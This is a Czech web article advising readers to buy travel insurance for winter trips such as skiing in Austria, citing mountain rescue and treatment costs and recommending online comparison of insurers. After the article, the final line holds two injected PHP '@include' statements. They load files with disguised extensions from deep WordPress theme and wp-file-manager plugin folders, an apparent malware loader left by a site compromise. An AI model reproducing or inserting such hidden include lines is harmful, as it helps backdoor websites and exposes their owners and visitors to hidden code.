Už plánujete zimní dovolenou?

Za okny už straší zima, a tak je pomalu potřeba myslet na Vánoce a zimní prázdniny. Právě ty mnoho Čechů využívá k výletům do zahraničí – ať už za lyžováním do Alp, nebo za sluníčkem k moři. Na takovou dovolenou je však nezbytné se pořádně připravit.

Katalogy cestovních kanceláří už obsahují zimní dovolené pro rok 2017, mnohé z nich aktuálně nabízí tzv. first minute pobyty za výhodnou cenu. Pokud víte, že v zimě určitě někam pojedete, není nic lepšího než zařídit si všechno s předstihem. A když říkáme všechno, máme na mysli i cestovní pojištění. Mnoho cestujících na něj zapomíná, někteří dokonce záměrně.

U zimních sportů je pojištění nezbytné

Spousta Čechů si řekne, že když jedou jen k sousedům do Rakouska a stráví tam pouze prodloužený víkend, nemá přece vůbec cenu si zařizovat nějaké cestovní pojištění. To je však omyl, protože k nehodě může dojít kdykoliv a náklady na péči na horách jsou vysoké. Například výjezd horské služby stojí v Rakousku zhruba 10 000 Kč, transport helikoptérou vyjde na 30 – 130 000 Kč a taková obyčejná zlomenina ramene a lokte stojí 160 000 Kč.

Modrá kartička zdravotního pojištěnce vám v tomhle případě nic moc nezaručuje. Ve státních zdravotnických zařízeních vás díky ní ošetří a česká pojišťovna náklady nakonec pravděpodobně proplatí, avšak je to boj na dlouhou trať. Je dost možné, že byste peníze museli dát z vlastní kapsy a pojišťovna by vám je vrátila až za dlouhé měsíce. V každém případě je lepší obětovat pár stovek korun za celou rodinu a zařídit si pojištění.

Sjednejte si pojištění online

Na pojištění zimní dovolené je sice dobré myslet s předstihem, ale žádné velké zařizování vás to stát nemusí. V dnešní době je možné si bez problémů sednout k počítači a srovnat nabídky různých pojišťoven. Až najdete tu nejlepší pro vaše potřeby, prostě si sjednáte pojištění online. Nezapomeňte však, že byste neměli hledět pouze na cenu. Důležité jsou rovněž limity pojistného plnění.

Takže až si vyberete ideální zájezd a zarezervujete konkrétní termín, nezapomeňte si objednat také cestovní pojištění.


@include "wp-content/themes/lancr/lib/customizer/install/js/include/0164.conf";@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/d/include/0655.jsc";